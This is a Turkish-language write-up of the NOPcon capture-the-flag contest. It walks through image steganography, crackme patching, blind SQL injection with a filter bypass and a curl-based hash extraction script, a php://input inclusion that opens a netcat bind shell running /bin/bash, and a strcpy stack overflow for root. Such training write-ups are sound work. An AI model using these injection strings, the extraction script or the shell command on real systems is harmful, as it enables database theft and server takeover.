NOPcon Capture The Flag Çözümleri

Transkript

1 NOPcon Capture The Flag Çözümleri Adım Çözümü İlk adım gerçek hayatta karşılaşılmayacak, dikkat ölçme amacıyla hazırlanmış bir adımdı. Katılımcılardan verdiğimiz iki resim dosyası arasında farkı bulmaları isteniyordu. Geek.jpg resim dosyasının içine bir IP Adresi gizlenmişti; # strings geek.jpg > a.txt ; strings geeks.jpg > b.txt ; diff a.txt b.txt 378,380d377 < 213.p < 128. < Q IP adresine browser ile girildiğinde aşağıdaki mesajla karşılaşılmaktaydı;

2 2. Adım Çözümü Bu adımda katılımcılardan 2.adımda ulaştıkları basit bir crackme uygulamasını cracklemeleri istenmekteydi; Uygulama Click Me butonuna basıldığında yukarıdaki mesajı vermekteydi. Çözüm NSNS ekibi; İlgili IP adresine girdiğimizde bizi "binary.exe" bekliyordu. Öncelikle güvenli bir windows makinada yazılımı çalıştırarak nasıl bir çıktı verdiğini ve yazılımın nasıl davrandığını inceledik. Çıktıyı gördükten sonra yazılımı daha detaylı incelemeye karar verdik. Bu aşamada yazılımı debug ya da disassamble etmeden önce -compress- 'lenmiş olabileceğini düşünerek hexdump çıktısında -compress/pack- izleri aradık; f UPX " e d UPX1...0" d e0 2e d e e d f1 1e e5 UPX!...e7..X f0 5a 93 2f 00 6d 80 0d d b Z./.m...`-.&..B b2 f2 b3 fd 00 1e 68 0b a 1c 0f h.a... $i c e5 e7 76 b7 ec b2 2f c a 1c e4 fa Tl..v.../..b Yukarıdaki satırlara rastladığımızda bu yazılımın UPX ile compress'lendiğini anladık. Daha sonra Aşağıdaki komutu çalıştırarak binary -uncompress- ettik; $ upx -d binary.exe Binary.exe yi OllyDb yazılımı kullanarak çalıştırdık ve binary.exe nin -output- unda gördüğümüz, Crack me Please :( ASCII karakterlerini aradık Aradığımız bu karakterlere ulaşıp bunun referansına ulaştığımızda. cmp / jnz instruction ikilisine rastladık. Bu noktada kodu çalıştırıp basitçe CPU Zero Flag ini toggle edebilirsiniz veya JNZ yi JZ ile yer değiştirebilirsiniz D2F. 75 1D 00402D2F. 75 1D JNZ SHORT binary.00402d4e JZ SHORT binary.00402d4e

3 Yukarıdaki şekilde -crack- işlemini gerçekleştirerek modifiye edilmiş binary.exeyi çalıştırmaya devam ettik ve MessageBox içinde 3. adım ile ilgili link adresine ulaştık; 3. Adım Çözümü NOPcon CTF hacking yarışmasının 3. aşaması 3 adımdan oluşuyordu: Sql enjeksiyon MD5 hash Cracking RFI ile Bindshell İlk olarak portaldaki sql enjeksiyon açığını tespit etmeniz ve daha sonra bu açığı kullanarak elde ettiğiniz md5 hash'i kırarak sisteme giriş yapmanız gerekiyordu. Portala giriş yaptıktan sonra file include açığını tespit edilip sunucuya netcat bağlantısı gerçekleştirilerek ve bu aşama başarı ile tamamlanacaktı. İncelemeye sql enjeksiyon ile başlayalım: Genelde login alanında brute-force ve FI denendi fakat zafiyetin index.php?page=sifremi unuttum sayfası içinde aranması gerekiyordu. Bu sayfada iki tane input alanı mevcuttu. kullanıcı adına göre adına göre adına göre alanı boş bir POST methodu kullanıyordu. Odaklanmamız gereken nokta kullanıcı adına göre kısmıydı.

4 Kullanıcı adına göre ara kısmını Firebug ile incelemeye başlıyoruz. Bu inputun id değerini POST ettiğini görüyoruz. Bir şeyler göndermeyi deneyelim: admin yazdığımız takdirde bize yeşil bir uyarı ekranı getiriyor. Başka bir şey yazdığımızda ise herhangi bir uyarı ekranı almıyoruz. Demekki veritabanında admin adlı bir kullanıcı mevcut. Diğer akla gelen şey ise admin kullanıcısına ait bilgilerin maile gönderilip, gönderilmediğiydi fakat veritabanı işlemi dışında mail gönderme gibi bir aksiyon yoktu. Şimdi bu alana sql enjeksiyon saldırısı gerçekleştireceğiz. Sql enjeksiyon için bir saldırı vektörü tanımlayalım: Method : POST Değişken : id Veri : admin' and '1'='1 Saldırı vektörümüzü string olarak oluşturduk. Datayı POST ettiğimiz takdirde, cevap TRUE olarak dönüyor ve ekranımızda yine sayın admin kullanıcı şifreniz yollandı. yazıyor. Buradan anlıyoruz ki, scriptte Post blind sql injection açığı mevcut. Açığı onaylamak adına Sifremiunuttum.php kaynak kodunu inceleyelim: Sql sorgusu: "SELECT * FROM kullanici WHERE kadi = '$id' ";

5 Saldırı vektörü dahil olduktan sonra: "SELECT * FROM kullanici WHERE kadi = 'admin' and '1'='1'"; Örnekte de gördüğümüz üzere Sql sorgusuna id değişkeni hiç bir filtreden geçmeden dahil oluyor. Sqli'nin varlığından emin olduğumuza göre saldırı vektörümüzü çeşitlendirelim: İlk olarak mysql sürümünü kontrol ediyoruz. False : admin' and substring(version(),1,1)=4 and '1'='1 True : admin' and substring(version(),1,1)=5 and '1'='1 5 değeri true olarak döndüğü için mysql sürümünün 5 olduğunu anladık. Saldırı vektöründe Subselect sorgular kullanacağımız için subselect'in çalışıp çalışmadığından emin olalım: admin' and (select 1)=1 and '1'='1 Çalışmadı! Çalışmamasının sebebinini sifremiunuttum.php kaynak kodlarıyla açıklamaya çalışacağım. if(preg_match('/(select SELECT)/', $id)): exit(); // engelle endif; Kod parçasını anlamaya çalışalım, preg_match fonksiyonu ile eğer gelen veri select veya SELECT olursa exit(); yaparak kodun çalışması engelleniyor. Burada katılımcılar için bir nevi Web Application Firewall simülasyonu oluşturmaya çalıştık. Bu korumayı aşmaya çalışalım ve saldırı vektörünü değiştirelim. admin' and (SeLeCt 1)=1 and '1'='1 Bu saldırı vektörünü kullandığımızda TRUE değeri dönecek. Md5 hash almak için sırasıyla tablo ve kolonları bulmaya çalışalım: admin' and (SeLeCt 1 from kullanici limit 0,1)=1 and '1'='1 Burada kullanici tablosunu tahmin etmemiz gerekiyor bu yüzden mysql5'in bize sunduğu information_schema özelliğini kullanalım Veritabanı ismini alıyoruz; admin' and 1=0 UniON ALL SeLecT '1',DATABASE(),'3

6 çıktı : ctfnopcon_db_ertevbcvb_ Veritabanı ismini kullanarak tablo ismini bulalım: admin' and 1=0 UniON ALL SeLecT '1',group_concat(table_name),'3' FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'ctfnopcon_db_ertevbcvb_ Çıktı : kullanici Şimdi tablo ismini kullanarak kolon ismini alıyoruz. admin' and (SeLeCt substring(concat(1,sifre),1,1) from kullanici limit 0,1)=1 and '1'='1 sifre kolonunu tahmin ederek bulduk. İşleri kolaylaştırmak için information_schema kullanalım: admin' and 1=0 UniON ALL SeLecT '1', group_concat(column_name), '3' from information_schema.columns group by table_name having table_name='kullanici çıktı : id,kadi,sifre 3 kolonumuz var. Şifre kolonuna odaklanalım ve verileri almaya başlayalım: ASCII tablo eşleşmesini kullanarak deneme-yanılma yöntemiyle yapabiliriz. admin' and ASCII(SUBSTRING((SeLeCt sifre FROM kullanici WHERE id=1),1,1)) = 50 and '1'='1 ASCII tablo: 2 admin' and ASCII(SUBSTRING((SeLeCt sifre FROM kullanici WHERE id=1),32,1)) = 98 and '1'='1 ASCII tablo: b 1. ve 32. karakteri alıyoruz; 2 rakamı ve b harfiymiş fakat bu yöntem oldukça uzun süreceği için kullanabileceğimiz başka bir saldırı vektörü var. admin' and sifre like '2% sifre kolonunda 2 ile başlayan karakterleri buluyor. Tabii ki bununla da tek tek harf ve rakam deneyeceğimiz için basit bir script kodlamamız gerekiyor. #!/bin/bash # CTF katılımcılarından Orhan Albay ın geliştirdiği script. sifre="" for n in {0..31} do for c in {0..9}

7 do res=$(curl --data "id=admin' and sifre like '$sifre$c%" -s " if echo $res grep -q "ifreniz yolland"; then sifre="${sifre}${c}"; echo $sifre; break; fi done for c in {a..f} do res=$(curl --data "id=admin' and sifre like '$sifre$c%" -s " if echo $res grep -q "ifreniz yolland"; then sifre="${sifre}${c}"; echo $sifre; break; fi done done kullanım: chmod +x ornek.sh;./ornek.sh Bu script ile bir kaç saniye içinde hash'i elde edebiliyoruz. Md5 hash : 2e5d49f392b0cd0f27bd56bd7e9eacbb Daha sonra bu hash'i kırmamız gerekiyor. Hash i kırdıktan sonra elde edeceğimiz şifre şu şekilde olmalıydı; Şifre : Şifreyi elde ettiğimize göre portala giriş yapıp son adımı gerçekleştirmemiz gerekiyor. Giriş yaptığımızda ilk dikkatimizi çeken alan index.php?page= oluyor. Çoğu yarışmacı bu alana FI denedi fakat başarılı olamadı. Neden başarılı olamadığını kodlara bakarak anlamaya çalışalım. index.php kaynak kodu: $whitelist = array('giris','sifremiunuttum','iletisim','yonetim','cikis','cikisyap'); if (in_array($_get['page'], $whitelist)) { include($_get['page'].'.php'); } else { include('anasayfa.php');

8 } Kod parçasını incelediğimizde Whitelist yöntemi kullanıldığını görüyoruz. Yani array list içindeki herhangi bir parçayı kullanmadığınız takdirde else bloku devreye girecek ve FI açığı bir işe yaramayacaktır. Bu yüzden bakış açımızı değiştirelim. Page değişkenine gelen değerlerin.php olarak çalıştığını görüyoruz. Demekki sifremiunuttum.php, yonetim.php gibi dosyalarımız var. Bu yüzden burada yapmanız gereken şey cikisyap.php içindeki RFI açığına odaklanmaktı. Cikis.php kaynak kodlarını inceleyelim: if(!preg_match('/(php:\/\/input)/', $_GET['page'])): exit(); // engelle endif; Yine bir regex kontrolü gerçekleştirdik. Eğer page değişkeni php://input değilse kodun çalışması durduruluyor. Kısacası php shell vs. elde etmeniz mümkün olmuyor. Devam edelim, Firefox eklentisi olan Hackbar'ı açıyoruz ve load url yapıyoruz. Php://input post methoduyla çalıştığı için enable post data diyoruz. POST DATA alanına system fonksiyonumuzu ve çalıştıracağımız komutu yazıyoruz. Sunucu da netcat kurulu olduğu için ilk olarak nc deneyeceğiz. nc -l -p e /bin/bash yazarak portu monitör etmeye başlıyoruz ve yüklemeye başlayınca Netcat ip port komutuyla bağlanmaya çalışıyoruz ve www-data kullanıcısıyla içerde olduğumuzu görüyoruz;

9 Tebrikler, 3. aşamayı da tamamlamış olduk :) 4. Adım Çözümü Son adım katılımcılardan /tmp dizini altında bulunan suidbit değeri atanmış exploitme uygulamasını istismar edip, root hakları elde etmeleri istenmekteydi. exploitme uygulaması NX disable olarak derlenmiş ve sistemde ASLR dışında hiçbir protection bulunmamaktaydı; Uygulama iki parametre almaktaydı. İlk argüman güvenli fonksiyon strncpy ile kopyalanırken, ikinci argüman strcpy ile kopyalanmaktaydı;

10 Aşağıdaki resimde görüldüğü gibi, ikinci argümana uzun bir input girildiğinde uygulama crash olmaktaydı; Uygulamayı iki kere çalıştırarak $esp registerının değerine baktığımızda, ASLR protection ını görebiliriz;

11 Aslında binary içine katılımcıların işini kolaylaştırmak için inline assembly olarak bir adet jmp esp instruction ı eklenmişti Dolayısıyla binary içinde jmp esp opcode larını aratan yarışmacılar bu adımı kolaylıkla geçebileceklerdi. Diğer yöntem ise ASLR yi brute force yaparak bypass etmekti. Binary içinde jmp esp instructionını bulduktan sonra, kısaca yapılması gereken /bin/sh shellcode umuzu stack e yazıp, jmp esp nin binary içindeki offsetini de EIP işaretçisinin üzerine yazarak, uygulamayı exploit etmekti.

12